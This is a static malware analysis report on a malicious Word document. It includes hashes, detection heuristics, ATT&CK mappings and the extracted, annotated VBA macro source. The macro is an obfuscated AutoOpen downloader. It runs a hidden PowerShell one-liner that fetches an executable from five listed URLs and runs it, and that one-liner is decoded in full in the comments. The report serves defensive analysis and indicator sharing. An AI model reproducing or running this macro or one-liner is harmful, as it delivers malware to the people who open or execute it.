Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eabb02e2198c7641…

MALICIOUS

Office (OLE)

67.8 KB Created: 2018-09-12 15:52:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: c5a728d166846974c51a1269cd51c4a6 SHA-1: b754c31dd324c313132214c4e68dff130972e033 SHA-256: eabb02e2198c7641bf9d3f8c1e1a467f5a7c55cfd6516f39078a2528083daefa
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Nastjencro' further suggests a downloader functionality. The macro's string concatenation is obfuscated but statically reversible: the Chr() arithmetic evaluates to the fixed characters 'c', 'C' and '"', the interleaved carets are cmd.exe escape characters that are stripped when the command line is parsed, and the PowerShell payload is stored back-to-front in a cmd variable (cP0); the `for /L %A in (` loop that begins the truncated UmVrfDp function presumably reassembles it in forward order at run time. Decoded, the macro launches `cmd /V:ON /C` with a hidden window (Shell WindowStyle 0) and a `powershell` one-liner that creates a Net.WebClient, splits a list of five HTTP URLs on '@', and for each URL tries DownloadFile to `%PUBLIC%\444.exe`, runs it with Invoke-Item and stops at the first success. The decoded download URLs (defanged) are hxxp://knightsofacademia[.]com/TtHVXp, hxxp://mauke[.]com/Cw8MhRxr, hxxp://mirvkartinkah[.]ru/VDs0, hxxp://metromowing[.]net/Gslc6ae and hxxp://mkf24[.]ru/0k; these hosts are the network indicators to block and hunt for. This is a staged downloader, so T1059.003 (Windows Command Shell), T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer) apply in addition to the techniques listed above.

Heuristics 6

  • ClamAV: Doc.Downloader.Nastjencro-6681864-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Nastjencro-6681864-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the generic wording "no modern VBA project was recovered" is contradicted for this sample by the OLE_VBA_MACROS finding and the extracted macros.bas artifact below: here the marker is simply the AutoOpen procedure of the recovered VBA project, so this finding adds no independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI present in virtually any Office document; it is not a network indicator and is unrelated to the macro's download URLs, which appear only in obfuscated (reversed, caret-interleaved) form inside the VBA.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4695 bytes
SHA-256: 964e89c7ff14329216c1b323efa18696459f61a700e4813c112b0ae0775882c0
Preview script
First 1,000 lines of the extracted script
' --- Module 1: "jONUMNtbK" (document class module) ---
' Exported-module attribute header as recovered by olevba. VB_Base =
' "1Normal.ThisDocument" together with VB_PredeclaredId = True marks this
' as the document's ThisDocument module; the AutoOpen procedure that
' follows lives here, which is why Word runs it when the document opens.
' The module name is random filler, like every other identifier in the
' macro.
Attribute VB_Name = "jONUMNtbK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point: Word runs AutoOpen automatically when the document is opened
' (the OLE_VBA_AUTOOPEN finding). Its only real work is the single Shell
' call in the middle; every other statement is padding.
Sub AutoOpen()
' "On Error Resume Next" split across line continuations (_), presumably to
' defeat naive signature matching. It silences every runtime error, which is
' what lets the junk Set statements below execute without aborting the macro.
On _
Error _
Resume _
Next
' Junk/padding: both sides of each Set are names that nothing in the
' recovered source declares. With errors suppressed they are no-ops whose
' only purpose is to dilute the code.
   Set wIXRDU = IvEjwj
   Set UYpPj = ZUkPq
   Set wSzfJz = ijQUcT
   Set ORIVO = nOobNk
' The payload. The command line is assembled at run time from five
' string-building functions: THlEd, OlwzlCzwn and UmVrfDp are in the
' preview below; bHALjjIGRWp and hsifiowqwDkzkk lie past the truncation
' point. THlEd begins with "cmd /V:ON/C" once its carets are stripped, so
' this launches cmd.exe. Format(0) yields the string "0", which Shell
' coerces to WindowStyle 0 (vbHide): no visible console window.
Shell THlEd + OlwzlCzwn + UmVrfDp + bHALjjIGRWp + hsifiowqwDkzkk, Format(0)
' More undefined-name padding, as above.
   Set OnKzkC = qwojM
   Set EQLvwA = iIJiCY
   Set INZlzh = aBAik
   Set mNfRr = IpXRO
End Sub



' --- Module 2: "ZwFEdDZMWQKFj" (standard module) ---
' olevba prints every VBA module stream back-to-back, so this second
' attribute header starts a new module. It holds the string-building
' functions that AutoOpen concatenates into the Shell command line.
Attribute VB_Name = "ZwFEdDZMWQKFj"
' Builds the head of the cmd.exe command line plus the closing part of the
' PowerShell payload. Decoding notes (they hold for this whole module):
'   * Format(Chr(4+10+15+17+53)) = Chr(99) = "c"
'     Format(Chr(3+7+10+11+36))  = Chr(67) = "C"
'     Format(Chr(1+3+4+5+21))    = Chr(34) = the double-quote character
'     Format() on a one-character string is an identity; the arithmetic
'     only hides the literal.
'   * The "^" characters are cmd.exe escape characters; cmd removes them
'     when it parses the line, so they carry no meaning in the payload.
'   * The PowerShell text is stored back-to-front. Read each decoded chunk
'     right-to-left to recover it.
' With carets removed and Chr() resolved, the function returns
'   cmd /V:ON/C"set cP0=<padding spaces>}}{hctac};kaerb;VUN$ metI-ekovnI;)VUN$ ,Saz$(eliFdaolnwoD.bti${yrt{)Xqa$ ni Saz$(hcaerof;'exe.'+Ytr$+'\'+cilbup:vne$=VUN$;'444' = Ytr$;)'@'
' i.e. cmd with delayed expansion (/V:ON) storing a reversed string in the
' variable cP0. Read backwards, the part after "set cP0=" is
'   '@');$trY = '444';$NUV=$env:public+'\'+$trY+'.exe';foreach($zaS in $aqX){try{$ibt.DownloadFile($zaS, $NUV);Invoke-Item $NUV;break;}catch{}}
' -- the end of a PowerShell loop that downloads each URL in $aqX (the list
' is built by OlwzlCzwn) to %PUBLIC%\444.exe, runs it with Invoke-Item and
' stops at the first success. Every Set statement in this function is the
' same undefined-name padding as in AutoOpen.
Function THlEd()

On _
Error _
Resume _
Next
Set icjXj = lrLSvw
   Set zAirG = jrCzIG
' -> cmd /V:ON/C"set c
AuBSU = Format(Chr(4 + 10 + 15 + 17 + 53)) + "md /" + "V^:^ON/" + Format(Chr(3 + 7 + 10 + 11 + 36)) + Format(Chr(1 + 3 + 4 + 5 + 21)) + "^s^e^" + "t " + Format(Chr(4 + 10 + 15 + 17 + 53))
Set UAihFC = nNJEA
   Set NOrns = JPZspl
   Set hOdpcG = SRPSSX
' -> P0=  (followed by padding spaces; variable name is cP0)
JFYSszTdOTl = "^P0=" + "^  ^" + "  " + " " + "^"
Set BfBcol = SQWbF
   Set sUQzFw = PXbXvw
   Set ZOwwq = JjJlvz
' -> (padding spaces)}}{hctac};   reversed: ;}catch{}}
tnzCijMp = " ^  ^ " + " ^ ^ " + " " + "^    ^" + "}}{^h" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "t" + "a" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^};"
Set ilqfX = BXHSDm
' -> kaerb;VUN$ metI-ekovnI;   reversed: ;Invoke-Item $NUV;break
RaEzzwkHY = "k^aer^" + "b;V^U" + "N^" + "$^ m^" + "e^" + "t^" + "I-^ek^" + "ovn^" + "I;"
Set topwr = fHlvi
   Set OKBUr = wmERE
   Set qpfnD = JErHH
' -> )VUN$ ,Saz$(eliF   reversed: File($zaS, $NUV)
iaJRbPI = ")VUN" + "^$" + "^ ,^S" + "^a^z$(" + "^eliF"
Set ziFkoO = JwRivr
   Set oXkdT = qbwrh
   Set WDtIK = zHzjQ
' -> daolnwoD.bti${yrt{)Xqa$ ni Sa   reversed: aS in $aqX){try{$ibt.Download
aBNVSVY = "da" + "^oln^" + "wo^D." + "bt^i${" + "^yrt{)" + "^Xq^" + "a$ ni^ " + "^Sa"
Set sNEIJf = DjXjNj
' -> z$(hcaerof;'exe.'+Ytr$+'\'   reversed: '\'+$trY+'.exe';foreach($z
hmbXOiQVB = "^" + "z^$(" + "^h" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^" + "a" + "e" + "r^of;^'" + "e^xe" + "^.^'^+^" + "Y^tr^$" + "+^'\'^"
Set lzZNs = NXwKo
   Set tGnsm = YalYjL
   Set TVqjwN = iYuRTT
   Set wmoEr = KTjuwp
' -> +cilbup:vne$   reversed: $env:public+
zUObVSka = "+" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^i^" + "l" + "b^up:" + "vn" + "^e$"
Set sbTaCB = lsHzEJ
' -> =VUN$;'444' = Ytr$;)'@'   reversed: '@');$trY = '444';$NUV=
vAClcjOiq = "=V" + "^UN$;'" + "^44" + "4'" + " = ^" + "Y^tr^$^" + ";)'@'"
' Concatenate the chunks in order; the result is the first segment of the
' Shell command line built in AutoOpen.
THlEd = AuBSU + JFYSszTdOTl + tnzCijMp + RaEzzwkHY + iaJRbPI + aBNVSVY + hmbXOiQVB + zUObVSka + vAClcjOiq
   Set zkoPu = rTcjb
   Set bkncm = aplXBI
   Set zYPKmv = FaSMZq
   Set ibcaI = YnciAG
   Set ouKQH = QzAuz
End Function
' Second segment of the Shell command line: the middle of the reversed
' PowerShell payload, carrying the download-URL list. Same tricks as THlEd
' (Chr(99) = "c", Chr(67) = "C", carets are cmd escapes, text is stored
' back-to-front; the Set statements are undefined-name padding).
' With carets removed the function returns
'   (tilpS.'k0/ur.42fkm//:ptth@ea6clsG/ten.gniwomortem//:ptth@0sDV/ur.haknitrakvrim//:ptth@rxRhM8wC/moc.ekaum//:ptth@pXVHtT/moc.aimedacafosthgink//:ptth'=Xqa$;tneilCbeW.teN tcejbo-wen=bti$ llehsrew
' which read right-to-left is
'   wershell $ibt=new-object Net.WebClient;$aqX='http://knightsofacademia.com/TtHVXp@http://mauke.com/Cw8MhRxr@http://mirvkartinkah.ru/VDs0@http://metromowing.net/Gslc6ae@http://mkf24.ru/0k'.Split(
' The leading "po" of "powershell" is supplied by the "o^p" that opens
' UmVrfDp (next function), and the ".Split(" is completed by the "'@')"
' at the end of THlEd. Network IOCs (defanged): hxxp://knightsofacademia[.]com/TtHVXp,
' hxxp://mauke[.]com/Cw8MhRxr, hxxp://mirvkartinkah[.]ru/VDs0,
' hxxp://metromowing[.]net/Gslc6ae, hxxp://mkf24[.]ru/0k.
Function OlwzlCzwn()

On _
Error _
Resume _
Next
Set jbhdZN = DnSFs
   Set MOiStj = KYIIJX
' -> (tilpS.'k0/ur.42fkm//:ptth@   reversed: @http://mkf24.ru/0k'.Split(
CtGqA = "(t" + "i^l^p^" + "S.'" + "^k0" + "/^ur^." + "^" + "4" + "^2" + "f" + "^k^m" + "//:^pt" + "t^h@"
Set jzLPbM = inDUR
   Set HMtsnB = wZBCjz
   Set wztZJS = pkSVCZ
   Set pLqAL = ziIKPj
' -> ea6clsG/ten.gniw   reversed: wing.net/Gslc6ae
OKBfXMsopmV = "^e^a6" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "l^sG/" + "t" + "^e" + "n^" + ".^gni^w"
Set RwZdJM = qwznzR
   Set tiwzE = KnwIG
' -> omortem//:ptth@0   reversed: 0@http://metromo
iSbjPncdE = "^o^m^or" + "^t^" + "em//^" + ":p^t" + "^" + "t^h^@^" + "0" + "^"
Set juXpHr = qGkfp
   Set RnPrt = KlUYE
' -> sDV/ur.haknitrakvrim//:ptth@rxRhM8wC/   reversed: /Cw8MhRxr@http://mirvkartinkah.ru/VDs
ArVpOcsozau = "sDV" + "/^ur" + "^.ha^kn" + "^i^t" + "rak" + "vr^i" + "m//" + ":^p" + "t^" + "th^@rx" + "Rh^M8" + "^w" + Format(Chr(3 + 7 + 10 + 11 + 36)) + "/^"
Set aUCBT = SDQHJ
   Set DcMSP = wVLtO
   Set duawlz = APlhiV
' -> moc.ekaum//:ptth@pXV   reversed: VXp@http://mauke.com
EJwfVwIRLo = "m^" + "o" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^." + "e^k^au" + "m//:p" + "t^t^h@" + "^p" + "XV" + "^"
Set WIizU = IHGpz
' -> HtT/moc.aimedacafo   reversed: ofacademia.com/TtH
JQkGHwXLBT = "H^t^T" + "/m^o" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "." + "ai^m^" + "e" + "da" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "afo"
Set bnjUZ = dRVKJ
' -> sthgink//:ptth'=Xqa$;tneilCbeW.teN t   reversed: t Net.WebClient;$aqX='http://knights
YDlIXHUYjTf = "s^t^h" + "^" + "g^ink/" + "/:^ptt" + "^h^'=" + "X^q" + "^a^$;^" + "tne^il" + Format(Chr(3 + 7 + 10 + 11 + 36)) + "^b^" + "e^" + "W^.^" + "te" + "N t"
Set QpDmK = ZJjsm
   Set fntCEH = ljSiWl
   Set wAcKAJ = vBhVlE
   Set qRTRc = vzDia
' -> cejbo-wen=bti$ llehsrew   reversed: wershell $ibt=new-objec
rijhazliX = Format(Chr(4 + 10 + 15 + 17 + 53)) + "ej" + "^bo^" + "-^w" + "en^=" + "bti^" + "$ l^l^" + "e^hs" + "rew^"
' Concatenate in order; AutoOpen appends this directly after THlEd's output.
OlwzlCzwn = CtGqA + OKBfXMsopmV + iSbjPncdE + ArVpOcsozau + EJwfVwIRLo + JQkGHwXLBT + YDlIXHUYjTf + rijhazliX
   Set sVjVkw = cNCTq
   Set DYcZT = iLdibi
End Function
Function UmVrfDp()

On _
Error _
Resume _
Next
Set Zhjra = cUMqr
   Set cBSUAY = IPMNw
EjCQHwSa = "o^p&&^f" + "^or /^" + "L %^A ^" + "i
... (truncated)